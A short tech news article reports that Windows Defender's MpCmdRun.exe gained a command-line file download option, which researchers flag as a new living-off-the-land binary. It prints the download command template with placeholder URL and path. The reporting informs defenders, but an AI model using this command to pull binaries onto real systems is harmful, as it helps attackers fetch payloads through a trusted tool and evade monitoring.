Windows Defender's new feature worry security researchers

Home » security

Reading time icon 1 min. read

Calendar icon Published on

by Surur Davids 

published on

Share this article

Readers help support MSpoweruser. We may get a commission if you buy through our links. Tooltip Icon

Read our disclosure page to find out how can you help MSPoweruser sustain the editorial team Read more

Windows Defender has added a new feature and security researchers are not too happy, as it has increased the attack surface of Windows.

Version 4.18.2007.9 or 4.18.2009.9 of the app has added the ability to download files via the command line using the app, e.g.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

… can now be used to download a binary from the internet.

While not an exploit in itself, the feature allows a script which can launch the command line to import further files from the internet using native so-called living-off-the-land binaries or LOLBINs.

Adding the feature to Windows Defender means there is another app admins have to keep an eye on and another app which hackers can exploit.

Fortunately, Windows Defender does still scan the apps it downloads, but this is of course not infallible.

The new “feature” was discovered by security researcher Mohammad Askar and verified by BleepingComputer. Read more here.

More about the topics: security, Windows Defender

Surur Davids

Surur Davids Shield

Smartphone Expert

Surur Davids is the founder of WMPoweruser which later became MSPoweruser.com. He's a smartphone expert with over a decade of experience.

Leave a Reply

Your email address will not be published. Required fields are marked *